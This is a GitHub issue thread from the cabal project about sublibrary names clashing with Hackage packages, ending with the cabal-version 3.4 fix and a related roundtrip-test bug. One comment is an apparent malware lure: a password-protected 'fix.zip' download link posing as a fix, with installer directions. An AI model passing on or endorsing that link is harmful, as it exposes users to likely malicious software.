### ISSUE TITLE
Sub libraries

### ISSUE THREAD

**Issue by coot** [haskell/cabal#10277]
Consider a package which has a sublibrary `cborg` and also depend on `cborg` library published on Hackage, e.g.

```
library ...

library cborg
  build-depends: base,
                 cborg
```

In such setup I am getting an error since cabal confuses that the `cborg` sub-library and the Hackage one.  I tried to fix this with this:

```
library ...

library cborg
  build-depends: base,
                 cborg:cborg
```

but it doesn't help.  The only way I found to fix this is to change the sub-library name to `x-cyborg` - and now it doesn't clash with a published package name, but that's rather unfortunate.  I'd expect sublibrary names to be independent namespace, so things like `typed-protocols:cborg` were possible (instead of rather lengthy `typed-protocols:typed-protocols-cborg`).

This should be fixed from another perspective.  Consider one publishes a package which contains `package:sublib`, and in the future one publishes `sublib` to Hackage - which will break the already published `package`.  From this perspective, I tend to think that all sublibraries should always be typed fully qualified, even in their own package.  So in the example above, `cborg` would always mean the published Hackage package cborg, not the `package:cborg` sublibrary - if one wants that as a dependency, then `package:cborg` should be used.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mpickering** [comment]
What is the error message you get? At which point are things confused?

**Comment by fgaz** [comment]
Seems like a duplicate of #6083. Try using `cabal-version: 3.4`

**Comment by fgaz** [comment]
> This should be fixed from another perspective. Consider one publishes a package which contains `package:sublib`, and in the future one publishes `sublib` to Hackage - which will break the already published `package`. From this perspective, I tend to think that all sublibraries should always be typed fully qualified, even in their own package. So in the example above, `cborg` would always mean the published Hackage package cborg, not the `package:cborg` sublibrary - if one wants that as a dependency, then `package:cborg` should be used.

IIRC the sublibrary has precedence over other packages, so this shouldn't be an issue. From cabal-version 3.4 the qualified syntax [is mandatory](https://cabal.readthedocs.io/en/stable/file-format-changelog.html#cabal-version-3-4).

**Comment by mpickering** [comment]
Hackage roundtrip tests are failing with a variant of this issue:

```
jasagredo

This cabal file just broke the hackage roundtrip tests I think https://hackage.haskell.org/package/io-classes-1.6.0.0/io-classes.cabal

12345678910111213              +Dependency
                (PackageName "io-classes")
                (OrLaterVersion (mkVersion [0]))
                mainLibSet,
              Dependency
                (PackageName "io-classes")
                (OrLaterVersion (mkVersion [0]))
                (NonEmptySet.fromNonEmpty
                  (NE.fromList
                    [
                      -LMainLibName,
                      LSubLibName (UnqualComponentName "si-timers")]))],
            buildTools = ...},

Seems like parse . toUTF8BS . showGenericPackageDescription . parse changes the build-depends: io-classes:{io-classes, si-timers} to build-depends: io-classes, io-classes:si-timers
^ To reproduce: cabal run hackage-tests -- roundtrip io-classes
```

**Comment by mpickering** [comment]
The problem arising from the `mkDependency` smart constructor:

```
 55 -- | Smart constructor of 'Dependency'.                                         
 56 --                                                                              
 57 -- If 'PackageName' is appears as 'LSubLibName' in a set of sublibraries,       
 58 -- it is automatically converted to 'LMainLibName'.                             
 59 --                                                                              
 60 -- @since 3.4.0.0                                                               
 61 mkDependency :: PackageName -> VersionRange -> NonEmptySet LibraryName -> Dependency
 62 mkDependency pn vr lb = Dependency pn vr (NES.map conv lb)                      
 63   where                                                                         
 64     pn' = packageNameToUnqualComponentName pn                                   
 65                                                                                 
 66     conv l@LMainLibName = l                                                     
 67     conv l@(LSubLibName ln)                                                     
 68       | ln == pn' = LMainLibName                                                
 69       | otherwise = l    
```

**Comment by fgaz** [comment]
> which converts `io-classes:io-classes` into just `io-classes`

Those [are equivalent](https://cabal.readthedocs.io/en/stable/cabal-package-description-file.html#pkg-field-build-depends). To me it looks like the problem is that it splits the dependency declaration into two equivalent declarations, as you point out at the end of https://github.com/haskell/cabal/issues/10277#issuecomment-2312199548.

This is a separate issue though. I'll open a new ticket.

**Comment by coot** [comment]
@fgaz `cabal-version: 3.4` indeed fixes it.  Thanks!
